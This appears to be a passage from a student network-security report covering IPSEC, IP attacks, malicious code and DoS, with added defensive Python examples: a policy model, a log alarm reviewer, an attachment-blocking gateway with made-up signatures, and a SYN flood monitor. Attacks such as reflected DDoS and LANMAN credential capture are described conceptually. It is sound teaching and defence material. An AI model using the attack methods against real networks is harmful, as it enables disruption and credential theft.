Network Layer Security among mutually trusting hosts is a relatively straightforward problem to solve. The standard protocol technique, employed in IPSEC, involves "encapsulating" an encrypted Network Layer packet inside a standard Network packet, making the encryption transparent to intermediate nodes that must process packet headers for routing, etc. Outgoing packets are authenticated, encrypted, and encapsulated just before being sent to the network, and incoming packets are decapsulated, verified, and decrypted immediately upon receipt. Key management in such a protocol is similarly straightforward in the simplest case. Two hosts can use any key-agreement protocol to negotiate keys with one another, and simply use those keys as part of the encapsulating and decapsulating packet transforms.

In many applications, security at the network layer has a number of advantages over security provided elsewhere in the protocol stack. Network semantics are usually hidden from applications, which therefore automatically and transparently take advantage of whatever network layer security services their environment provides. Especially importantly, the network layer offers a remarkable flexibility not possible at higher or lower abstractions: security can be configured end-to-end (protecting traffic between two hosts), route-to-route (protecting traffic passing over a particular set of links), edge-to-edge (protecting traffic as it passes between "trusted" networks via an "untrusted" one), or in any other configuration in which network nodes can be identified as appropriate security endpoints.

2.5.1 TCP/IP – The Language of the Internet (refer to [12])

TCP/IP (Transmission Control Protocol/Internet Protocol) is the "language" of the Internet. Anything that can learn to "speak TCP/IP" can connect to the Internet. This is functionality that occurs at the Network (IP) and Transport (TCP) layers in the ISO/OSI Reference Model. Consequently, a host that has TCP/IP functionality (such as Unix, OS/2, MacOS, or Windows NT) can easily support applications (such as Netscape's Navigator) that use the network.

As noted, IP is a "network layer" protocol. This is the layer that allows the hosts to actually "talk" to each other. It handles such things as carrying datagrams, mapping an Internet address (such as 10.2.3.4) to a physical network address (such as 08:00:69:0a:ca:8f), and routing, which takes care of making sure that all of the devices that have Internet connectivity can find the way to each other.

2.5.2 Attacks against IP (refer to [12])

A number of attacks against IP are possible. Typically, these exploit the fact that IP does not provide a robust mechanism for authenticating the source of a packet. This is not necessarily a weakness by definition, but it is an important point, because it means that the facility of host authentication has to be provided at a higher layer of the ISO/OSI Reference Model. Today, applications that require strong host authentication (such as cryptographic applications) do this at the application layer.

IP Spoofing

This is where one host claims to have the IP address of another. Since many systems (such as router access control lists) define which packets may and which packets may not pass based on the sender's IP address, this is a useful technique to an attacker: he can send packets to a host, perhaps causing it to take some sort of action.

Additionally, some applications allow login based on the IP address of the person making the request (such as the Berkeley r-commands). These are both good examples of how trusting untrustworthy layers can provide security that is considered weak.

IP Session Hijacking

This is a relatively sophisticated attack, first described by Steve Bellovin. It is very dangerous, however, because there are now toolkits available in the underground community that allow even inexperienced hackers to perform this attack. IP session hijacking is an attack whereby a user's session is taken over and put under the control of the attacker. If the user was in the middle of email, the attacker is looking at the email, and then can execute any commands he wishes as the attacked user. The attacked user simply sees his session dropped, and may simply log in again, perhaps not even noticing that the attacker is still logged in on his account.

For the description of the attack, refer to the large network of networks in Figure 2.1.

Figure 2.1: A Wider View of Internet-connected Networks

In this attack, a user on host A is carrying on a session with host G. Perhaps this is a telnet session, where the user is reading his email, or using a Unix shell account from home. Somewhere in the network between A and G sits host H. The person on host H watches the traffic between A and G, and runs a tool which starts to impersonate A to G, and at the same time tells A to shut up, perhaps trying to convince it that G is no longer on the net (which might happen in the event of a crash, or major network outage). After a few seconds of this, if the attack is successful, host H has "hijacked" the session of our user. Anything that the user can do legitimately can now be done by the attacker, illegitimately. As far as G knows, nothing has happened.

This can be solved by replacing standard telnet-type applications with encrypted versions of the same thing. In this case, the attacker can still take over the session, but he'll see only "gibberish" because the session is encrypted. The attacker will not have the needed cryptographic key(s) to decrypt the data stream from G, and will, therefore, be unable to do anything with the session.

2.5.3 IPSEC Policy Architecture (refer to [13])

Let us examine the architecture of Network Layer Security more closely, using IPSEC as a specific example. In this environment, policy must be enforced whenever packets arrive at or are about to leave a Network Layer endpoint (which could be an end host, a gateway, a router, or a firewall). When an incoming packet arrives from the network, the security endpoint first determines the processing it requires:

- If the packet is not protected, should it be accepted? This is essentially the "traditional" packet filtering problem, as performed, e.g., by network firewalls.

- If the packet was encapsulated under the security protocol: is there correct key material (usually contained in a data structure called a "security association") required to decapsulate it? Should the resulting packet (after decapsulation) be accepted?

A second stage of packet filtering occurs at this point. Notice that a packet may be successfully decapsulated and still not be accepted (e.g., a decapsulated packet might contain an illegal network source IP address such as 127.0.0.1).

A security endpoint makes similar decisions when an outgoing packet is ready to be sent:

- Is there a security association (SA) that should be applied to this packet? If there are several applicable SAs, which one should be selected?

- If there is no SA available, how should the packet be handled? It may be forwarded to some network interface, dropped, or queued until an SA is made available, possibly after triggering some automated key management mechanism such as the IPSEC ISAKMP protocol.

Observe that because these questions are asked on a packet-by-packet basis, policy filtering must be performed, and any related security transforms applied, quickly enough to keep up with network data rates. This implies that in all but the slowest network environments there is insufficient time to process elaborate security languages, perform public key operations, consult large tables, or resolve rule conflicts in any sophisticated manner. Implementations of Network Layer Security services, including IPSEC and most firewalls, therefore usually employ very simple, filter-based languages for configuring their packet-handling policies. In general, these languages specify routing rules for handling packets that match bit patterns in packet headers, based on such parameters as incoming and outgoing addresses and ports, services, packet options, etc.
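An added example (not the report's code nor any IPSEC implementation) that models the decisions above in Python: an ordered filter-based policy, an SA table keyed by SPI, and the two-stage check on incoming packets. Encapsulation is represented as an (spi, packet) pair rather than real ESP, and all addresses, rules and keys are constructed.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    """Only the header fields the filter language looks at (constructed model)."""
    src: str
    dst: str
    proto: str                  # "tcp", "udp", "icmp"
    dport: Optional[int] = None


@dataclass
class SA:
    """Security association: key material negotiated with one peer endpoint."""
    spi: int
    peer: str
    key: bytes                  # would come from a key-agreement protocol (e.g. ISAKMP)


@dataclass
class Rule:
    """One entry of a filter-based policy: header selectors -> bypass / discard / protect."""
    src: str
    dst: str
    proto: str                  # "any" or a protocol name
    dport: Optional[int]
    action: str
    peer: Optional[str] = None  # for protect: the peer whose SA must carry the packet

    def matches(self, p):
        return (ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and self.proto in ("any", p.proto)
                and self.dport in (None, p.dport))


class SecurityEndpoint:
    """Gateway or host applying an ordered outbound and inbound policy plus an SA table."""

    def __init__(self, spd_out, spd_in, sas):
        self.spd_out, self.spd_in = spd_out, spd_in   # first matching rule wins
        self.sad = {sa.spi: sa for sa in sas}        # SA database keyed by SPI
        self.queue = []                              # packets waiting for key management

    @staticmethod
    def _first(rules, p):
        return next((r for r in rules if r.matches(p)), None)

    def outbound(self, p):
        """-> ("send", Packet) | ("send", (spi, Packet)) | ("drop", None) | ("queue", None)."""
        r = self._first(self.spd_out, p)
        if r is None or r.action == "discard":
            return ("drop", None)
        if r.action == "bypass":
            return ("send", p)
        # protect: several SAs may apply; this policy simply takes the first one for the peer
        usable = [sa for sa in self.sad.values() if sa.peer == r.peer]
        if not usable:
            self.queue.append(p)             # hold it until key management creates an SA
            return ("queue", None)
        return ("send", (usable[0].spi, p))  # encapsulation modelled as (spi, inner packet)

    def inbound(self, wire):
        """wire is a bare Packet (unprotected) or an (spi, Packet) tuple (encapsulated)."""
        if isinstance(wire, Packet):
            r = self._first(self.spd_in, wire)       # stage 1: traditional packet filtering
            return ("accept", wire) if r is not None and r.action == "bypass" else ("drop", None)
        spi, inner = wire
        sa = self.sad.get(spi)
        if sa is None:
            return ("drop", None)                    # no key material: cannot decapsulate
        if ip_address(inner.src).is_loopback:
            return ("drop", None)                    # stage 2: e.g. 127.0.0.1 inside the tunnel
        r = self._first(self.spd_in, inner)
        if r is None or r.action != "protect" or r.peer != sa.peer:
            return ("drop", None)                    # decapsulated fine, but policy rejects it
        return ("accept", inner)


# Constructed policy for a gateway in front of 10.1.0.0/16 with peer gateway 203.0.113.9.
SPD_OUT = [
    Rule("10.1.0.0/16", "10.2.0.0/16", "any", None, "protect", peer="203.0.113.9"),
    Rule("10.1.0.0/16", "0.0.0.0/0", "tcp", 80, "bypass"),
    Rule("0.0.0.0/0", "0.0.0.0/0", "any", None, "discard"),
]
SPD_IN = [
    Rule("10.2.0.0/16", "10.1.0.0/16", "any", None, "protect", peer="203.0.113.9"),
    Rule("0.0.0.0/0", "10.1.0.0/16", "tcp", 25, "bypass"),
    Rule("0.0.0.0/0", "0.0.0.0/0", "any", None, "discard"),
]
SAS = [SA(spi=0x1001, peer="203.0.113.9", key=b"constructed-demo-key")]
GATEWAY = SecurityEndpoint(SPD_OUT, SPD_IN, SAS)
```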

2.6 Internal Network Security

Although focusing on securing the network's perimeter is important, securing it internally is equally important. If by some way a hacker manages to get into the network, he should not be able to wander around easily without getting caught. Therefore, one should apply the following to make the internal network secure:

• Patch and update all PCs before they are connected to the network, and then on a regular basis. Note that patches need to be tested to avoid having problems with databases or applications [3].

• System administrators should use one-time passwords only. In this way, in case a hacker cracks the admin's password, it would only be valid for this one session. An example of a one-time password mechanism is SecurID by RSA [3].

• When an application is installed, some service accounts may be created. They are accounts which do not have a human user associated with them. These accounts are assigned default passwords that will most likely never be changed. Therefore, it is important for an administrator to regularly change these passwords and monitor the logs of these service accounts.

• Monitoring of logs is important: administrators should regularly read the logs to monitor any unusual use of an account. Many freeware tools (such as log-IDS by Adam Richard [3]) can help decipher the logs (which otherwise are almost impossible to read) into something that the administrator can understand. Moreover, by using a centralized syslog server, it will be much more difficult for hackers to access the logs and edit them.

• Also, available freeware such as EventAlarm is useful when the administrator wants to monitor a user's logging in and out in a fast way. Such freeware gives pop-up screen alarms to the administrator whenever user X or Y logs on or off. Moreover, this freeware can be licensed and additional options can be added so that alarms are given in various situations.

• Segregating the network can reduce vulnerabilities. In this way, a user will have specific privileges and would not be able to access all parts of the network (like vital servers, or other departments' files). So if ever a hacker cracks a user ID and password, less damage will be done if there is segregation: he won't be able to access the whole network.

If these rules are properly followed in our FYP, potential problems can be lessened, whether coming from a hacker that has got in or a legitimate user that has bad intentions.
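An added example, not the report's code nor EventAlarm's: a review of constructed centralized syslog lines in Python that raises an alarm whenever a watched user logs on or off, flags logons by service accounts, and flags repeated failed logins on one account. The log format, host names and account names are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed line format: "<syslog timestamp> <host> auth: <EVENT> user=<name> src=<ip>"
LOG_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) auth: "
                    r"(?P<event>LOGON|LOGOFF|FAILED) user=(?P<user>\S+) src=(?P<src>\S+)$")

WATCHED_USERS = {"jdoe", "admin"}             # the "user X or Y" the administrator watches
SERVICE_ACCOUNTS = {"svc_backup", "svc_sql"}  # created by applications, no human behind them
FAIL_THRESHOLD, FAIL_WINDOW_S = 3, 120        # N failures on one account within the window

SAMPLE_LOG = """\
Mar 12 09:15:01 fileserver auth: LOGON user=jdoe src=10.1.5.5
Mar 12 09:16:40 fileserver auth: FAILED user=admin src=10.1.9.9
Mar 12 09:16:42 fileserver auth: FAILED user=admin src=10.1.9.9
Mar 12 09:16:45 fileserver auth: FAILED user=admin src=10.1.9.9
Mar 12 09:20:03 dbserver auth: LOGON user=svc_sql src=10.1.9.9
Mar 12 09:31:12 fileserver auth: LOGOFF user=jdoe src=10.1.5.5
Mar 12 09:40:00 fileserver auth: LOGON user=bob src=10.1.5.6
"""


def parse(line, year=2006):
    """Return the fields of one line as a dict (ts as datetime), or None if it is not an auth line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime("%d %s" % (year, d["ts"]), "%Y %b %d %H:%M:%S")
    return d


def review(log_text):
    """Run the three checks over a log and return (kind, user, detail) alerts in log order."""
    alerts, failures = [], defaultdict(list)
    for line in log_text.splitlines():
        e = parse(line)
        if e is None:
            continue
        user, event, ts = e["user"], e["event"], e["ts"]
        if user in WATCHED_USERS and event in ("LOGON", "LOGOFF"):
            alerts.append(("watched-user", user, "%s on %s" % (event.lower(), e["host"])))
        if user in SERVICE_ACCOUNTS and event == "LOGON":
            alerts.append(("service-account-logon", user, "from %s" % e["src"]))
        if event == "FAILED":
            # keep only failures inside the window, then count this one
            recent = [t for t in failures[user] if (ts - t).total_seconds() <= FAIL_WINDOW_S]
            recent.append(ts)
            failures[user] = recent
            if len(recent) == FAIL_THRESHOLD:      # alert once when the threshold is reached
                alerts.append(("repeated-failures", user, "%d failures within %ds from %s"
                               % (FAIL_THRESHOLD, FAIL_WINDOW_S, e["src"])))
    return alerts


if __name__ == "__main__":
    for alert in review(SAMPLE_LOG):
        print("ALARM:", alert)
```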

2.7 Survey of Most Common Threats

We will begin by explaining attacks automated by malicious code, then we will explain hacker attacks not automated by malicious code. DoS attacks will constitute a section on their own due to the fact that they are the most widespread attack on the Internet. We will end this section with an explanation of social engineering attacks.

2.7.1 Attacks Automated by Malicious Code

Malicious code is a piece of software which can damage or alter data and programs on a system without the permission or notice of the user. The sequence of instructions is used to intentionally cause adverse effects to the system.

Figure 2.2: Classification of malicious code

We can see from the above figure that there are two types of malicious code: those that need a host program and those that are independent. Those that need a host program are fragments of programs that cannot exist independently of some actual application program, utility or system program. Independent ones are self-contained programs that can be run by the operating system.

1. Trojan Horse

A Trojan horse is a malicious, security-breaking program that is disguised as something benign, such as a game, a directory lister or an archiver. The software is wrapped together with the malicious code into a single file or program. The program appears to be performing a useful function but it may also be quietly performing some harmful or unwanted action such as deleting the victim's files. The malicious code is typically a back door, also known as an illicit server, but it can be a virus, worm or any other kind of code that allows the attacker to do damage. Common ways to spread Trojan horses are email, IRC (Internet Relay Chat), and websites. An example of a Trojan horse file is openme.gif.exe (an extension is added to a seemingly harmless file). When the Trojan horse is executed it will start its malicious job. If the job consists of planting a back door, the attacker will be notified (by email or IRC). Now the attacker can use the victim computer as a zombie in a DDoS (Distributed Denial of Service; explained in a separate section later) attack to flood a target system. The attacker can also remotely control the infected computer (open the CD-ROM, send messages, open websites, reboot, listen to the microphone input, delete files). The two most famous programs for creating back doors are Back Orifice and NetBus. The back doors are sent to the victim as Trojan horses (disguised as a harmless program).

2. Virus

The virus is the most common type of malicious code. It can infect systems by attaching itself to files and programs. Just like its biological counterpart, it needs a host to infect. A virus is usually a program that needs to be executed by a user before it can do any damage. For example, a virus attached to an email message is usually only harmful when a user opens the attachment. Unlike a worm, a virus cannot infect other computers without assistance. It is propagated, for example, by humans trading programs with their friends or by e-mail. The virus might only propagate itself and then allow the program to run normally (without doing further damage). However, usually, after propagating silently for a while, it starts doing things like writing cute messages on the terminal or playing strange tricks with the display, or even, in extreme cases, wiping out all of the user's files.

So in summary, the four phases of the life of a virus (after being executed) are:

The dormant phase (not all viruses have this stage): The virus is idle. It will eventually be activated by some event, such as a date, the presence of another program or file, or the capacity of the disk exceeding some limit.

The propagation phase: The virus places an identical copy of itself into other programs or into certain system areas on the disk. Each infected program will now contain a clone of the virus, which will itself enter a propagation phase.

The triggering phase: The virus is activated to perform the function for which it was intended. As with the dormant phase, the triggering phase can be caused by a variety of system events, such as a count of the number of times the virus has copied itself.

The execution phase: The function is performed. The function may be harmless, such as a message on the screen, or damaging, such as the destruction of programs and data files.

There are also different types of computer viruses:

Figure 2.3: Main types of viruses

Memory-resident virus: Lodges in main memory as part of a resident system program. From that point on, the virus infects every program that executes.

Program file virus: This is the most common type of virus; it attaches itself to executable files such as .EXE and .COM. The file acts as a carrier, and when the file is executed or opened, the malicious code executes and the virus spreads to infect other files.

Figure 2.4: Program File Virus

Polymorphic virus: This type of virus has the ability to change its signature to avoid detection by anti-virus software. It attempts to trick anti-virus software by slightly modifying its own code when it spreads to other files. A polymorphic virus can modify itself by encrypting or compressing part of its code.

Boot sector virus: This type of virus attaches itself to the boot sector of a floppy or hard disk. When the computer boots, the virus will reside in memory and infect other disks. Modern mainboards provide a BIOS option to enable boot sector virus protection, which basically prevents modifications to the boot sector.

Stealth virus: This type of virus attempts to hide itself to avoid detection by anti-virus software. It attempts to mislead the services used to detect the virus: when the infected file or boot sector is scanned by anti-virus software, the virus attempts to return the properties of the original clean version of the file or boot sector.

Macro virus: Macro viruses exploit vulnerabilities inherent to macro languages such as Visual Basic in Microsoft Office. This type of virus is often found in Word documents. When a user opens the document, the malicious code is executed.

Email virus: A more recent development in malicious software is the e-mail virus. Rapidly spreading e-mail viruses make use of a Microsoft Word macro embedded in an attachment. If the recipient opens the e-mail attachment, the Microsoft Word macro is activated; then the e-mail virus sends itself to everyone on the mailing list in the user's e-mail package, and the virus does local damage.

3. Worm

A worm is similar to a virus, but there is one important difference: a worm doesn't need to attach itself to a file or program to be reproduced and executed, as a virus does. A worm is self-contained; it can replicate itself and infect entire networks. Because of the recursive structure of the propagation, the spread rate of worms is very fast and poses a big threat to the Internet infrastructure as a whole. Examples of worms are: MyDoom, Netsky, Bagle, Blaster, Code Red, Nimda.

4. Logic Bomb

A logic bomb is a smart piece of malicious code that executes only when certain conditions are met; it is triggered when a certain event occurs. An example is a virus that executes on April Fool's Day (but infected the system long before that date), or a format.exe command that is executed only when the user logs on with administrative permissions. Another example of a logic bomb sends a note to the hacker when the infected computer is on the internet and runs a specific application such as MS Word. This bomb does not actually begin the attack but tells the hacker that the victim has met the needed state for an attack to begin.

Figure 2.5: Logic Bomb

1. Attacker implants logic bomb

2. Victim reports installation

3. Attacker sends attack message

Countermeasures against malicious code: Prevention and detection of malicious code typically involves anti-virus and other detection products at gateways, mail servers, and workstations. Those products generally scan messages for known signatures of a variety of malicious code, or for potentially dangerous behavioral characteristics. Products differ in their detection capabilities and in the range of malicious code included in their signatures. Detection products should not be relied upon to detect all malicious code. Additionally, anti-virus and other products that rely on signatures are generally ineffective when the malicious code is encrypted. For example, VPNs, IPSec, and encrypted e-mail will all shield malicious code from detection. Heuristic anti-virus products generally execute code in a protected area of the host to analyze and detect any hostile intent. Heuristic products are meant to defend against previously unknown or disguised malicious code. Malicious code may be blocked at the firewall or gateway. For example, a general strategy might be to block all executable e-mail attachments, as well as any ActiveX or Java applets. A more refined strategy might block based on certain characteristics of known code. Protection of servers involves examining input from users and only accepting the input which is expected. This activity is called filtering. If filtering is not employed, a Web site visitor, for instance, could employ an attack that inserts code into a response form, causing the server to perform certain actions. Those actions could include changing or deleting data and initiating fund transfers. Protection from malicious code also involves limiting the capabilities of the servers and Web applications to only the functions necessary to support operations. An additional detection control involves network and host intrusion detection devices. Network intrusion detection devices can be tuned to alert when known malicious code attacks occur. Host intrusion detection can be tuned to alert when it recognizes abnormal system behavior, the presence of unexpected files, and changes to other files.
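Added example (not from the report): the gateway attachment policy and signature scanning described above, applied to constructed attachments in Python. It blocks executable types and double-extension names like openme.gif.exe, scans what remains against a made-up signature list, and shows that the same content, once encrypted, passes the signature scan unseen; every name, signature and payload here is constructed for the demonstration.

```python
"""Added example (not part of the report): a mail-gateway check applying the
attachment policy and signature scanning described above to constructed data.
Every file name, signature and payload here is made up for the demonstration."""
from dataclasses import dataclass

# Attachment types the gateway policy refuses outright ("block all executable
# e-mail attachments"). Constructed list, not exhaustive.
EXECUTABLE_EXTENSIONS = {"exe", "com", "bat", "scr", "pif", "vbs", "js", "jar"}

# Constructed signatures standing in for a vendor signature database:
# signature name -> byte pattern found in a known sample.
SIGNATURES = {
    "demo.backdoor.a": b"OPEN_BACKDOOR_PORT",
    "demo.macro.b": b"Sub AutoOpen()",
}


@dataclass
class Attachment:
    filename: str
    content: bytes


def final_extension(filename: str) -> str:
    return filename.lower().rsplit(".", 1)[-1] if "." in filename else ""


def is_double_extension(filename: str) -> bool:
    """True for names like openme.gif.exe: a harmless-looking extension
    followed by an executable one."""
    parts = filename.lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTENSIONS


def is_executable(filename: str) -> bool:
    return final_extension(filename) in EXECUTABLE_EXTENSIONS


def scan_signatures(content: bytes) -> list:
    """Names of all known signatures whose byte pattern occurs in the content."""
    return sorted(name for name, pat in SIGNATURES.items() if pat in content)


def gateway_verdict(att: Attachment) -> tuple:
    """Apply the policy in order: extension rules first, then the signature
    scan. Returns (action, reason)."""
    if is_double_extension(att.filename):
        return ("block", "double extension disguising an executable")
    if is_executable(att.filename):
        return ("block", "executable attachment type")
    hits = scan_signatures(att.content)
    if hits:
        return ("block", "signature match: " + ", ".join(hits))
    return ("allow", "no policy violation and no known signature")


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Toy cipher used only to show that encrypted content hides signatures
    from a signature scanner (the point made in the text about VPNs, IPSec
    and encrypted e-mail)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


if __name__ == "__main__":
    macro_doc = b"...Sub AutoOpen()\n  Call SendToEveryone\n..."
    samples = [
        Attachment("openme.gif.exe", b"MZ...OPEN_BACKDOOR_PORT..."),
        Attachment("setup.exe", b"MZ..."),
        Attachment("report.doc", macro_doc),
        Attachment("holiday.jpg", b"\xff\xd8\xff\xe0JFIF..."),
        # Same macro document, but encrypted: the scanner no longer sees it.
        Attachment("report.doc", xor_encrypt(macro_doc, b"k3y")),
    ]
    for att in samples:
        print(f"{att.filename:16} {gateway_verdict(att)}")
```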

2.7.2 Hacker Attacks (not automated by malicious code)

1. Eavesdropping

The name eavesdropping comes from the fact that this technique involves secretly listening to the data traveling through the attacked network. Other names for eavesdropping include sniffing and snooping. Eavesdropping is only possible because most data sent through connections is sent as unencrypted plaintext. Thus, a hacker can just listen to the connection stream between the two connected users and get whatever information he needs. This method is usually employed by those who are unwilling to take large risks, as it is a very low-risk method. There is almost no chance of getting caught when this method is used, as no intrusion is involved and the hacker can back off quickly without a trace if anything goes wrong. This method is also used by those who want to listen to what is shared between two people, be it secret data or just a personal conversation. In this respect, this method is the best for spies and blackmailers. [14]

2. IP spoofing

Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed (identity spoofing). An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet. After gaining access to the network with a valid IP address, the attacker can modify, reroute, or delete your data. The attack may be directed to a specific computer addressed as though it is from that same computer. This may make the computer think that it is talking to itself, which may cause some operating systems such as Windows to crash or lock up.

3. Man in the middle attack

As the name indicates, a man-in-the-middle attack occurs when someone between you and the person with whom you are communicating is actively monitoring, capturing, and controlling your communication transparently. For example, the attacker can re-route a data exchange. When computers are communicating at low levels of the network layer, the computers might not be able to determine with whom they are exchanging data. Session hijacking occurs through the following scenario. First, the attacker watches a session open on a network. Once authentication is complete, he attacks the client computer to disable it, and uses IP spoofing to claim to be the client who was just authenticated and steal the session. Man-in-the-middle attacks are like someone assuming your identity in order to read your message. The person on the other end might believe it is you because the attacker might be actively replying as you to keep the exchange going and gain more information.

Countermeasure: This attack can be prevented if the two legitimate systems share a secret which is checked periodically during the session.

4. Server spoofing

A C2MYAZZ utility can be run on Windows 95 stations to request LANMAN authentication from the client (the LanMan password hash is used by Windows NT for authenticating users locally and over the network [16]). The attacker will run this utility, acting like the server, while the user attempts to log in. If the client is tricked into sending LANMAN authentication, the attacker can read the username and password from the network packets sent. [15]

Countermeasure: New operating systems are not vulnerable.

5. DNS poisoning

This is an attack where DNS information is falsified. This attack can succeed under the right conditions, but may not be very practical as an attack form. The attacker will send incorrect DNS information which can cause traffic to be diverted. The DNS information can be falsified since name servers do not verify the source of a DNS reply. When a DNS request is sent, an attacker can send a false DNS reply with additional bogus information which the requesting DNS server may cache. This attack can be used to divert users from a correct web server, such as a bank's, and capture information from customers when they attempt to log on. [15]

6. Password cracking

Sometimes, in case of a partial break-in, the encrypted password file of a company might be exposed to a hacker (or cracker, in that case). If that happens, the attacker will start password cracking the file, namely trying all the possible combinations with the idea of finding the weakest passwords and gaining privileges later on. [17]

Countermeasure: In case the company is aware that its password file has been compromised, it should immediately notify all employees to change their passwords, so that even if weak passwords are exposed, they wouldn't be valid ones anymore. However, if the company is not aware of its password file exposure, it should constantly try to crack its password file just like an attacker would do and filter out the weakest passwords.

2.7.3 DoS

A DoS (Denial of Service) attack is an attempt to prevent legitimate users of a service or network resource from accessing that service or resource. DoS attacks are not targeted at stealing, modifying or deleting information. A DoS attack comes in many forms, like cutting off the power to a system or flooding a system with seemingly legitimate network traffic: anything that results in a denial of service. DoS attacks usually make use of software bugs to crash or freeze a service or network resource, or of bandwidth limits by making use of a flood attack to saturate all bandwidth.

Different methods of DoS:

• DoS

A DoS attack is when the attacker launches an attack from his or her own computer. This is done by sending packets of data to the remote computer; for each packet sent, the target machine receives one. This is a very uncommon form of denial of service because the attack most of the time is very unsuccessful and at times can be easily traced. DoS attacks are usually carried out by amateur script kiddies.

Figure 2.6: DoS

• DDoS

A distributed denial of service attack is when an attacker attacks from multiple source systems. A DDoS attack is generally more effective at bringing down huge corporate sites than a DoS attack. The attacker can line up a large number of computers to connect to a website at the same time. The web server has a maximum allowed number of client connections. If this number is attained, the server will deny further connections, so there will be a denial of service. Usually the attacker does not own all these computers, so he uses Trojan horses with back doors as malicious code to infect computers, which become zombies (also called “secondary victims”). The users of the infected computers are not aware that their computers are used in a DDoS attack. DoS bots (“bot” is short for robot: the flooding program present on the secondary victim's computer) usually have standard flooding capabilities, such as ICMP, UDP, TCP, and SYN flooding. The Internet services and resources under attack are the “primary victims”. A typical DDoS attack consists of master, slave, and victim: the master being the attacker, the slaves being the compromised systems, and the victim being the attacker's target.

Figure 2.7: DDoS Attack

• DRDoS

DRDoS is when an attacker sets his bots to flood different intermediate hosts with spoofed packets. For example, the attacker sets half his bots to flood yahoo.com with spoofed ICMP packets and half to flood ebay.com with spoofed ICMP packets. The spoofed packets seem to have microsoft.com as a source, so yahoo.com and ebay.com flood microsoft.com (ebay.com and yahoo.com will reply to the spoofed source). For each packet the attacker sends to yahoo.com or ebay.com, yahoo.com or ebay.com may have thousands of machines on the same IP address. Each of these machines will reply to the spoofed ICMP packet, therefore amplifying the power of the attack greatly.

Figure 2.8: DRDoS. Red lines: connection from the attacker's computer to the zombie computers. Blue lines: zombies sending spoofed ICMP packets; the ICMP packets look like they come from the Internet core router the attacker wants to attack. Green lines: each of the computers connected to ebay.com, yahoo.com, cnn.com and Amazon.com replies to the spoofed ICMP packets, therefore flooding the Internet core router.

Figure 2.9: DRDoS. Malicious SYN packets are being "reflected" off innocent TCP servers; their SYN/ACK responses are being used to flood and attack the target network.

There are also different types of DoS attacks:

• TCP SYN Flood Attack

A TCP session is established by using a three-way handshake mechanism, which allows the client and the host to synchronize the connection and agree upon the initial sequence numbers. When the client connects to the host, it sends a SYN request to establish and synchronize the connection. The host replies with a SYN/ACK, again to synchronize. Then the client acknowledges that it received the SYN/ACK packet by sending an ACK. When the host receives the ACK the connection will become OPEN, allowing traffic from both sides (full-duplex). The connection remains open until the client or the host issues a FIN or RST packet, or the connection times out. If you flood a remote computer with SYN packets, it is going to send back a SYN/ACK packet for each, so bandwidth will be wasted. In addition, in a TCP SYN flood attack the connection is not completed, so the target computer is left waiting for an ACK; therefore it is possible to max out the remote computer's connection queue. Connections from legitimate users will be rejected in this case. The amount of bandwidth this attack uses is very minimal, although if done on a very large scale it could affect the bandwidth of a web server.

Figure 2.10: TCP 3-way handshake

Countermeasure: Many routers and other network nodes today are able to detect SYN floods by monitoring the amount of unacknowledged TCP sessions and killing them before the session queue is full. They can often be configured to set the maximum allowed number of half-open connections, and limit the amount of time the host waits for the final acknowledgement. Without these preventive measures, the server could eventually run out of memory, causing it to crash entirely.
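Added example (not the report's own code): the countermeasure just described, a half-open connection monitor with a queue limit and a timeout, run over a constructed packet trace in Python. Addresses, ports and the deliberately tiny queue size are assumptions made for the demonstration.

```python
"""Added example (not part of the report): a half-open connection monitor of
the kind the countermeasure above describes, run over a constructed packet
trace. Addresses, ports and the (deliberately tiny) queue size are made up."""


class HalfOpenMonitor:
    """Tracks the half-open queue of one host: SYN received, final ACK not yet."""

    def __init__(self, max_half_open=3, timeout=5.0):
        self.max_half_open = max_half_open  # maximum allowed half-open connections
        self.timeout = timeout              # seconds to wait for the final ACK
        self.half_open = {}                 # (src_ip, src_port) -> time of SYN
        self.established = set()            # (src_ip, src_port) fully opened
        self.alerts = []                    # (time, description)

    def expire(self, now):
        """Drop half-open entries that waited longer than the timeout."""
        stale = [k for k, t in self.half_open.items() if now - t > self.timeout]
        for k in stale:
            del self.half_open[k]
        return len(stale)

    def process(self, pkt):
        """Feed one packet (time, src_ip, src_port, flags) to the monitor."""
        now, src, sport, flags = pkt
        self.expire(now)
        key = (src, sport)
        if flags == "SYN":
            if len(self.half_open) >= self.max_half_open:
                # Queue is full: kill the oldest unacknowledged session so the
                # flood cannot exhaust the queue, and raise an alert.
                oldest = min(self.half_open, key=self.half_open.get)
                del self.half_open[oldest]
                self.alerts.append((now, f"half-open queue full, dropped {oldest}"))
            self.half_open[key] = now
        elif flags == "ACK" and key in self.half_open:
            # Third step of the handshake: the connection becomes OPEN.
            del self.half_open[key]
            self.established.add(key)
        elif flags in ("FIN", "RST"):
            self.established.discard(key)
            self.half_open.pop(key, None)


def run_trace(packets, max_half_open=3, timeout=5.0):
    """Run a whole trace and return the monitor for inspection."""
    mon = HalfOpenMonitor(max_half_open, timeout)
    for pkt in packets:
        mon.process(pkt)
    return mon


# Constructed trace against one server: two legitimate clients complete the
# handshake; 203.0.113.x are spoofed sources that never answer the SYN/ACK.
TRACE = [
    (0.0, "10.0.0.5", 40001, "SYN"),
    (0.1, "10.0.0.5", 40001, "ACK"),
    (1.0, "203.0.113.10", 1000, "SYN"),
    (1.1, "203.0.113.11", 1001, "SYN"),
    (1.2, "203.0.113.12", 1002, "SYN"),
    (1.3, "203.0.113.13", 1003, "SYN"),  # queue full: oldest entry is killed
    (1.4, "203.0.113.14", 1004, "SYN"),
    (2.0, "10.0.0.6", 40002, "SYN"),
    (2.1, "10.0.0.6", 40002, "ACK"),
    (9.0, "10.0.0.7", 40003, "SYN"),     # by now the stale entries have timed out
]

if __name__ == "__main__":
    m = run_trace(TRACE)
    print("established:", sorted(m.established))
    print("alerts:", m.alerts)
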